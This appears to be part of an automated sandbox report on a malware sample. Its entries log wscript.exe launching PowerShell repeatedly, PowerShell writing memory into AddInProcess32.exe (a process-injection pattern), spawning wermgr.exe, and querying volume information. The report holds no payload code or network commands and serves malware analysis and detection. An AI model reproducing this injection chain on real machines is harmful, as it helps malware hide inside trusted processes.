          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1184008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1310000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1311000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1092008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1150000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1151000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: F1C008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 540000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 541000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 3B0008
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5960" "2556" "2808" "2640" "0" "0" "2560" "0" "0" "0" "0" "0" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5264" "2560" "2180" "2464" "0" "0" "2640" "0" "0" "0" "0" "0" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2056" "2800" "2732" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3780" "2612" "2844" "2596" "0" "0" "2508" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5256" "2508" "2512" "2556" "0" "0" "2560" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5368" "2468" "2228" "2508" "0" "0" "2496" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6068" "2816" "2752" "2820" "0" "0" "2824" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1596" "2640" "2808" "2340" "0" "0" "2572" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4392" "2800" "2312" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6780" "2824" "2552" "2828" "0" "0" "2832" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
